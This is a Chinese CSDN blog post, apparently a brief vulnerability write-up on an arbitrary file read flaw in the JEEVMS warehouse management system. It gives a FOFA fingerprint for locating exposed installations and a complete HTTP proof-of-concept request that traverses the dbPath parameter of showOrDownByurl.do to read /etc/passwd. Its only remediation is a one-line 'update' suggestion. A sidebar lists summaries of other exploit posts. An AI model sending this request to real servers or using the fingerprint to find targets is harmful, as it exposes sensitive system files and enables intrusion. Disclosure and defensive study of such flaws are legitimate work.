JEEVMS仓库管理系统任意文件读取漏洞

最新推荐文章于 2024-06-20 14:58:28 发布
最新推荐文章于 2024-06-20 14:58:28 发布
阅读量426 收藏
点赞数 2
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/136649664
版权
本文报道了JEEVMS仓库管理系统中的一个任意文件读取漏洞(CVECNVDCNNVD),攻击者可通过特定URL参数读取服务器上的敏感文件。建议用户尽快更新到最新版本以修复此安全问题。
摘要由CSDN通过智能技术生成

1.漏洞介绍

JEEVMS仓库管理系统任意文件读取漏洞

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA: body=“plug-in/lhgDialog/lhgdialog.min.js?skin=metro”

fid=“cC2r/XQpJXcYiYFHOc77bg==”

在这里插入图片描述

5.POC
GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

在这里插入图片描述

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
JEEWMS 任意文件读取漏洞
weixin_43567873的博客
03-29 104
JEEWMS 任意文件读取漏洞
【原创】JEECMS v6~v7任意文件上传漏洞(2)
weixin_34245749的博客
01-19 640
文章作者:rebeyond 受影响版本:v6~v7 漏洞说明: JEECMS是国内Java版开源网站内容管理系统(java cms、jsp cms)的简称。该系统基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点;采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构。广泛应用于政府(部委和省级政府部门、市、县、乡及委办局)、教...
JEEWMS存在任意文件读取漏洞
zkaqlaoniao的博客
06-20 257
JEEWMS基于JAVA的仓库管理系统(支持3PL(三方物流)和厂内物流),包含PDA端和WEB端,功能涵盖WMS,OMS,BMS(计费管理系统),TMS,成功应用于多家国内知名大客户,客户群体:冷链,干仓,快消品,汽车主机厂和配件厂等行业。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
JEECMS后台任意文件编辑漏洞及拿shell
收集盒 Book box
07-11 5251
JEECMS是基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点 · 采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构 安全性做得非常变态,当网站安装完成后就不再允许执行任何目录下的jsp文件了(web.xml配置了过滤器禁止了很多种动态脚本)。     2.x后台: login/Jeecms.do 3.x
玩了下JeeCms命令执行漏洞
NilLazy的博客
11-26 6800
第一个站点 首先看了下信息,是管理员权限 (好像这种命令执行漏洞都是administrator权限吧。。。 然后就是看下开没开3389了。。 Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:80 0.0.0
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
蓝海卓越计费管理系统任意文件读取漏洞
Cwillchris的博客
06-16 274
将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。python3 fofa-cwillchris.py -k "蓝海卓越计费管理系统"./蓝海卓越计费管理系统.bin -l 1.txt (先用fofa脚本爬取所有碧海威相关资产(
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
bagecms V3.1.3 后台任意文件读取漏洞1
08-03
- 然后,`XUtils::b64decode`解码`filename`,并使用`file_get_contents`读取文件内容。 - 最终,这些内容被渲染到页面上供用户查看。 #### 漏洞证明 - **测试步骤**: - 使用管理员账号登录后台。 - 构造恶意...
jeecms万能验证码
12-09
jeecms安装完毕后,找到项目对应的目录,把三个文件进行替换,就可以在注册、登录、留言时免验证码。登录密码错误三次后显示验证码,输入任意数如123就行。注明:jeecms9.2版本已验证通过。
溢出代码 教你网站溢出漏洞
08-21
溢出代码 教你大神的网络攻防 网站溢出漏洞
申瓯通信 在线录音管理系统 download 任意文件读取漏洞复现
0xSec
06-17 606
申瓯通信在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
jeecms v9.3 has a stroed xss vulnerability
libieme的博客
10-31 3682
jeecms v9.3 has a stroed xss vulnerability An issue was discovered in jeecms v9.3 There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. poc ...
jeecms明文密码传输漏洞
qq_36397267的博客
06-01 2191
关于jeecms明文密码传输漏洞修改:思路:由于jeecms密码加密采用md532位加密算法,是不可逆过程,数据库存放的是加密后的密码,登陆认证是将前台传入的密码加密后和数据库进行对比,所以往后台提交密码为加密后的密码的话,势必数据库密码也要加密一次,然后做对比就可以了。前台修改://密码框密码进行加密function passwordMd5(){    var x=document.getEle...
【原创】JEECMS v6~v7任意文件上传漏洞(1)
weixin_34160277的博客
01-19 1846
文章作者:rebeyond 受影响版本:v6~v7 漏洞说明: JEECMS是国内Java版开源网站内容管理系统(java cms、jsp cms)的简称。该系统基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点;采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构。广泛应用于政府(部委和省级政府部门、市、县、乡及委办局)、教...
某版本JEECMS后台存在通用struts2命令执行漏洞
"黑色键盘's Bolg"
12-25 1607
某版本JEECMS后台存在通用struts2命令执行漏洞。 可通过谷歌搜索关键字inurl:login/jeecms.do,可获得多个存在st2的漏洞网站 该版本为jeecmsV2.x版本,漏洞系struts2框架自带的一个安全漏洞,由于jeecms在2010年开始停止了对jeecmsV2.X版本的维护,并建议广大用户统一升级到jeecms最新版本,估计还有很多用户至今未升级,在此,我
jeecms无法修改子栏目顺序,引出的源码漏洞
Soongp的博客
02-21 1857
老哥最近正在做一个cms的小项目(www.uni-orange.com),验收前期,逐一解决系统bug,直到一个bug的出现,害得老哥老老实实地坐了一天!! 简单介绍一下使用的cms框架:jeecms,国内开源的cms框架,其商业版jeecms并不开源,作为互联网产品,至今已经迭代到v8.1版本,这个数字说明:即使是一个产品,它仍然是存在问题,需要不断完善优化的。 相信多数使用过jeecms
Jenkins 任意文件读取漏洞
最新发布
07-12
Jenkins是一个流行的开源持续集成工具,它允许自动化软件构建、测试和部署过程。然而,在某些版本中存在一个已知的安全漏洞,通常称为“Jenkins任意文件读取漏洞”或CVE-2021-22073。这个漏洞发生在jenkins主控台插件管理功能中,攻击者如果能够利用该漏洞,可以构造恶意请求,导致Jenkins服务器从远程或本地文件系统读取未经授权的文件漏洞的原理是由于插件管理界面的一个设计缺陷,使得恶意用户可以构造URL包含通配符或其他路径解析符号,进而获取到敏感文件。这种漏洞未经授权的访问权限可能会泄露敏感信息,如配置文件、源代码甚至用户的私有数据。 为了修复这个问题,Jenkins社区会发布安全更新,并建议受影响的用户尽快升级到最新版本,禁用不受信任的插件,或者配置适当的文件系统权限策略来限制对文件的访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值